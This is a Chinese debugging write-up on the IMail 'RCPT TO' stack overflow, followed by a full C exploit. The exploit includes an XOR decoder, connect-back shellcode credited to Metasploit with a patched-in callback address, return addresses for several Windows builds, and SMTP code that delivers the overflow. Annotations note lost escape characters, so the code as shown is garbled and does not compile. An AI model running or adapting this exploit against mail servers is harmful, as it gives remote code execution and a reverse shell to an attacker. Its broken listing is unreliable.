IMAIL RCPT溢出漏洞调试心得


文:郭海俊

最近对IMAIL RCPT存在的漏洞进行了相关调试,心得体会:

(1)、不要总盯着jmp/call esp,多看看eax、ebx、ecx、edx、esi、edi、ebp等寄存器是否含有shellcode位置,还要注意ESP+??,即函数参数中是否含有shellcode位置。

(2)、关于shellcode的编码问题, shellcode不能含有如下7个字符:

<

>

@

:

空格

想法:测试输入字符过滤,可以用ASCII码表去覆盖缓冲区,然后用OllyDBG去看缓冲区的内容。

针对IMAIL  8.10,8.12,8.15做了测试,成功溢出,没有测试8.11和8.13,8.14的版本,有兴趣的可以测试下。

下面是相关的利用代码:

 

#include <winsock2.h>

#include <windows.h>

 

#pragma comment(lib, "ws2_32.lib")

 

 

// 22-byte decoder stub that is placed in front of sc[] (see the memcpy of 22 bytes in
// imail_exp()). The comment below records that decode[5] holds the XOR key byte: the sixth
// escape here is xB8, which matches the 0xB8 imail_exp() XORs every byte of sc[] with.
// NOTE(review): the "\x" escapes have lost their backslashes in this copy ("xebx0f..."
// instead of "\xeb\x0f..."), so as written these are plain ASCII literals and their length
// is not 22; the original source presumably had proper escapes.
unsigned char decode[] =

//22 decode[5] = xor_byte

"xebx0fx5Bx80x33xB8x43x81x3Bx44x6Fx41x78x75xF4xEBx05xE8xECxFFxFFxFF";

//22 decode[5] = xor_byte (alternative stub, same layout, different key byte -- left disabled)

//"xebx0fx58x80x30x9cx40x81x38x44x6Fx41x78x75xF4xEBx05xe8xecxffxffxff";

 

// 4-byte end marker appended after sc[] by imail_exp(); the same byte sequence
// (x44 x6F x41 x78, ASCII "DoAx") is embedded in decode[] above, which is what the stub
// compares against to find the end of the encoded payload.
unsigned char end_mark[] = "x44x6Fx41x78";

                    

///*

//connect back shellcode copied from metasploit shellcode framework

// Connect-back payload, 356 bytes per the row comments, taken from the Metasploit
// framework according to the note above. It is a mutable global: imail_exp() patches
// sc[221..224] with cb_ip and sc[228..229] with cb_port, then XORs all 356 bytes with
// 0xB8 in place before copying them into the outgoing buffer. The 7f 00 00 01 / 22 11
// bytes visible in rows 14 and 15 are therefore only placeholders that never reach the wire.
// NOTE(review): as with decode[], the backslashes of the "\x" escapes are missing in this copy.
unsigned char sc[] =

"xe8x56x00x00x00x53x55x56x57x8bx6cx24x18x8bx45x3c"

"x8bx54x05x78x01xeax8bx4ax18x8bx5ax20x01xebxe3x32"

"x49x8bx34x8bx01xeex31xffxfcx31xc0xacx38xe0x74x07"

"xc1xcfx0dx01xc7xebxf2x3bx7cx24x14x75xe1x8bx5ax24"

"x01xebx66x8bx0cx4bx8bx5ax1cx01xebx8bx04x8bx01xe8"

"xebx02x31xc0x5fx5ex5dx5bxc2x08x00x5ex6ax30x59x64"

"x8bx19x8bx5bx0cx8bx5bx1cx8bx1bx8bx5bx08x53x68x8e"

"x4ex0execxffxd6x89xc7x81xecx00x01x00x00x57x56x53"

"x89xe5xe8x1fx00x00x00x90x01x00x00xb6x19x18xe7xa4"

"x19x70xe9xecxf9xaax60xd9x09xf5xadxcbxedxfcx3bx57"

"x53x32x5fx33x32x00x5bx8dx4bx18x51xffxd7x89xdfx89"

"xc3x8dx75x14x6ax05x59x51x53xffx34x8fxffx55x04x59"

"x89x04x8exe2xf2x2bx27x54xffx37xffx55x28x31xc0x50"

"x50x50x50x40x50x40x50xffx55x24x89xc7x68x7fx00x00" // 14 rows = 224 bytes so far; sc[221..224] (7f 00 00 01 placeholder) is overwritten with cb_ip by imail_exp()

"x01x68x02x00x22x11x89xe1x6ax10x51x57xffx55x20x59" // row 15; sc[228..229] (22 11 placeholder) is overwritten with cb_port by imail_exp()

"x59x68x43x4dx44x00x89xe3x87xfax31xc0x8dx7cx24xac"

"x6ax15x59xf3xabx87xfax83xecx54xc6x44x24x10x44x66"

"xc7x44x24x3cx01x01x89x7cx24x48x89x7cx24x4cx89x7c"

"x24x50x8dx44x24x10x54x50x51x51x51x41x51x49x51x51"

"x53x51xffx75x00x68x72xfexb3x16xffx55x04xffxd0x89"

"xe6xffx75x00x68xadxd9x05xcexffx55x04x89xc3x6axff"

"xffx36xffxd3xffx75x00x68x7exd8xe2x73xffx55x04x31" // 22 rows = 352 bytes

"xdbx53xffxd0"; // 352 + 4 = 356 bytes total -- the length imail_exp() encodes and copies

//*/

/*

unsigned char sc[] =

"xe8x56x00x00x00x53x55x56x57x8bx6cx24x18x8bx45x3c"

"x8bx54x05x78x01xeax8bx4ax18x8bx5ax20x01xebxe3x32"

"x49x8bx34x8bx01xeex31xffxfcx31xc0xacx38xe0x74x07"

"xc1xcfx0dx01xc7xebxf2x3bx7cx24x14x75xe1x8bx5ax24"

"x01xebx66x8bx0cx4bx8bx5ax1cx01xebx8bx04x8bx01xe8"

"xebx02x31xc0x5fx5ex5dx5bxc2x08x00x5ex6ax30x59x64"

"x8bx19x8bx5bx0cx8bx5bx1cx8bx1bx8bx5bx08x53x68x8e"

"x4ex0execxffxd6x89xc7x81xecx00x01x00x00x57x56x53"

"x89xe5xe8x1fx00x00x00x90x01x00x00xb6x19x18xe7xa4"

"x19x70xe9xecxf9xaax60xd9x09xf5xadxcbxedxfcx3bx57"

"x53x32x5fx33x32x00x5bx8dx4bx18x51xffxd7x89xdfx89"

"xc3x8dx75x14x6ax05x59x51x53xffx34x8fxffx55x04x59"

"x89x04x8exe2xf2x2bx27x54xffx37xffx55x28x31xc0x50"

"x50x50x50x40x50x40x50xffx55x24x89xc7x68x7fx00x00"

"x01x68x02x00x22x11x89xe1x6ax10x51x57xffx55x20x59"

"x59x68x43x4dx44x00x89xe3x87xfax31xc0x8dx7cx24xac"

"x6ax15x59xf3xabx87xfax83xecx54xc6x44x24x10x44x66"

"xc7x44x24x3cx01x01x89x7cx24x48x89x7cx24x4cx89x7c"

"x24x50x8dx44x24x10x54x50x51x51x51x41x51x49x51x51"

"x53x51xffx75x00x68x72xfexb3x16xffx55x04xffxd0x89"

"xe6xffx75x00x68xadxd9x05xcexffx55x04x89xc3x6axff"

"xffx36xffxd3xffx75x00x68xefxcexe0x60xffx55x04x31"

"xdbx53xffxd0";

*/

// Per-target return addresses (a pop/ret gadget in each listed build, per the original
// note), little-endian byte order. imail_exp() selects a row with jmpaddr[os_ver]; the
// row order matches the os_ver table printed by main()'s usage text.
// NOTE(review): os_ver comes straight from argv and is not range-checked anywhere in this
// file, so any value outside 0..3 indexes past the table.

unsigned char jmpaddr[][4] =

{ "xe1x1exfax7f",      // cn 2k/xp/2003

  "xafxd8x87x7c",    // en 2003 sp1 NTDLL.DLL

  "x4cxc1xd5x77",   // en 2003 sp0 USER32.DLL

  "x97x31x02x75"    // en 2k All SPs

};          

 

//

// Function prototype

//

void imail_exp(int smtp_ip, int smtp_port, int cb_ip, int cb_port, int imail_ver, int os_ver);

 

//

//main()

//

//

// main(): argument handling only. With exactly six arguments (argc == 7) it converts them

// with inet_addr()/atoi() and calls imail_exp(); otherwise it prints the usage text.

// NOTE(review): "void main" is non-standard (int main expected), and the converted values

// are passed on without any validation -- imail_exp() relies on imail_ver and os_ver

// being in range.

//

void main(int argc, char* argv[])

{

       if(argc == 7)

       {

              // argv[1]/argv[3] are IPv4 strings (inet_addr), the rest integers (atoi)

              imail_exp(inet_addr(argv[1]), atoi(argv[2]), inet_addr(argv[3]), atoi(argv[4]), atoi(argv[5]), atoi(argv[6]));

       }

       else

       {

              // NOTE(review): this literal contains unescaped inner quotes around RCPT TO and

              // no line breaks; presumably \" and \n escapes were lost when the listing was

              // copied, since as shown it does not compile.

              printf(

                     "IMail "RCPT TO" Remote Stack Overflow Exploit "

                     "Usage:"

                     "  %s <attack_ip> <smtp_port> <cb_ip> <cb_port> <imail_ver> <os_ver>"

                     "  imail_ver: 0 ==> 8.10, 8.12 tested"

                     "             1 ==> 8.15 tested(maybe 8.13)"

                     "  os_ver:    0 ==> cn 2k/xp/2003"

                     "             1 ==> en 2003 sp1 NTDLL.DLL"

                     "             2 ==> en 2003 sp0 USER32.DLL"

                     "             3 ==> en 2k All SPs"

                     ,argv[0]);

       }

}

 

/*
 * imail_exp - build the oversized "RCPT TO" line and deliver it over a plain SMTP session.
 *
 * smtp_ip / cb_ip     : IPv4 addresses as returned by inet_addr() (already in network order).
 * smtp_port / cb_port : host-order port numbers (atoi() results from main()).
 * imail_ver           : 0 or 1, selects where the return address is placed (switch below).
 * os_ver              : row of jmpaddr[]; NOT range-checked here.
 *
 * Every failure is reported with printf() and ends the function early; there is no return
 * value. sc[] is a global that this function modifies in place (address/port patch and XOR
 * encoding), so it is not safe to call twice in one process.
 * NOTE(review): the two "= ;" initialisers and the empty '' character constants below are
 * not valid C as shown -- presumably "{0}" and escaped control characters were lost when the
 * listing was copied, the same way the "\x" backslashes were.
 */
void imail_exp(int smtp_ip, int smtp_port, int cb_ip, int cb_port, int imail_ver, int os_ver)

{

       char  buf[1024] = ;      // outgoing SMTP line; its only NUL comes from the ">" copy in the switch below

       char  respond[512] = ;   // server replies; never explicitly NUL-terminated after recv()

       int   i;

       char* p;

 

       WSADATA     wsaData;

       SOCKET  sock;

       struct  sockaddr_in      smtp_addr;

 

       char ehlo[] = "EHLO ph4nt0m";

       char mailfrom[] = "MAIL FROM <root@ph4nt0m.org>";

       char quit[] = "QUIT";    // declared but never sent -- the session is simply closed

 

       // Patch the callback address into the payload: the four bytes of cb_ip are copied

       // verbatim, since inet_addr() already returned them in network order.

       p = (char*)&cb_ip;

       sc[221] = p[0];

       sc[222] = p[1];

       sc[223] = p[2];

       sc[224] = p[3];

 

       // Port is written high byte first (p[1] then p[0]); that yields network order only on

       // a little-endian host -- assumes x86 Windows.

       p = (char*)&cb_port;

       sc[228] = p[1];

       sc[229] = p[0];

 

       //decode[5] = 0xB8;

 

       // XOR-encode the 356 payload bytes in place with the key decode[5] expects, and refuse

       // any encoded byte the receiving parser would treat specially (this is the filter the

       // write-up above describes). The check runs on the encoded byte, so on failure sc[]

       // is left partially encoded and the printed %c is the encoded value, not the original.

       for(i=0; i<356; i++)

       {

              sc[i] = sc[i] ^ 0xB8;

              if(    sc[i]==0x00||

                     sc[i]==''||

                     sc[i]==''||

                     sc[i]=='V'||

                     sc[i]==' ' ||

                     sc[i]=='@' ||

                     sc[i]==':' ||

                     sc[i]=='<' ||

                     sc[i]=='>' ||

                     sc[i]=='"'  )

              {

                     printf("sc[%d]:%c bad char!", i, sc[i]);

                     return;

              }

       }

 

       // Layout of buf: 11-byte command prefix, 22-byte decoder, 356-byte encoded payload,

       // 4-byte end marker, then 0x41 filler from the memset() up to the return address.

       // memset() leaves no terminator, so strlen(buf) below depends on the switch writing one.

       memset(buf, 0x41, sizeof(buf));

       strcpy(buf, "RCPT TO <@:");

       memcpy(buf+11, decode, 22);

       memcpy(buf+11+22, sc, 356);

       memcpy(buf+11+22+356, end_mark, 4);

 

       // NOTE(review): os_ver is not validated; jmpaddr has four rows.

       p = jmpaddr[os_ver];

 

    switch(imail_ver)

       {

       case 0: //8.10 8.12

              //memcpy(buf+11+492, "x41x41x41x41", 4);

              memcpy(buf+11+492, p, 4);

              // NOTE(review): ">" is a 2-byte literal but 4 bytes are read from it -- a 2-byte

              // over-read (UB). The copied NUL is what terminates buf; the original was

              // presumably ">\r\n" with the escapes lost in copying. Same issue in case 1.

              memcpy(buf+11+496, ">", 4);

              break;

      

       case 1: //8.15

              //memcpy(buf+11+544, "xddxddxfdx7f", 4);

              memcpy(buf+11+548, p, 4);

              memcpy(buf+11+552, ">", 4);

              break;

 

       default:

              printf("This Version is not supported.");

              return;

       }

      

 

       //printf("%s", buf);

 

       // Winsock initialisation. NOTE(review): no path in this function calls WSACleanup().

       if(WSAStartup( MAKEWORD(2,2), &wsaData) != 0)

    {

              printf("[-]WSAStartup() error.");

              return;

    }

 

       if((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) 

    {

              printf("[-]socket() error.");

              return;

    }

   

       smtp_addr.sin_family = AF_INET;

       smtp_addr.sin_port = htons((short)smtp_port);

       smtp_addr.sin_addr.s_addr = smtp_ip;

       ZeroMemory(smtp_addr.sin_zero, 8);

 

       printf("[+]connecting to %s:%i...", inet_ntoa(smtp_addr.sin_addr), smtp_port);

       // connect to the server

       if(connect( sock, (struct sockaddr*)&smtp_addr, sizeof(struct sockaddr)) == SOCKET_ERROR)

       {

              printf("[-]connect() error.");

              closesocket(sock);

              return;

       }

 

       // NOTE(review): every recv()/send() result below is discarded, and respond is not

       // terminated after recv(): a 512-byte reply leaves no NUL for printf/strstr, and a

       // short later reply leaves stale bytes from the previous one, so the "250" checks can

       // match old data.

       recv(sock, respond, sizeof(respond), 0);

       printf("[S]%s", respond);

 

       send(sock, ehlo, strlen(ehlo), 0);

       recv(sock, respond, sizeof(respond), 0);

       if(strstr(respond, "250"))

       {

              printf("[C]%s", ehlo);

       }

       else

       {

              printf("[-]fail ehlo.");

              closesocket(sock);

              return;

       }

 

       send(sock, mailfrom, strlen(mailfrom), 0);

       recv(sock, respond, sizeof(respond), 0);

       if(strstr(respond, "250"))

       {

              printf("[C]%s", mailfrom);

       }

       else

       {

              printf("[-]fail mailfrom.");

              closesocket(sock);

              return;

       }

 

       // strlen(buf) stops at the NUL written by the ">" copy in the switch above.

       send(sock, buf, strlen(buf), 0);

       printf("[+]Sending exploit code..."

              "Good Luck!");

       //Sleep(3000);

 

       closesocket(sock);

       return;

}

 
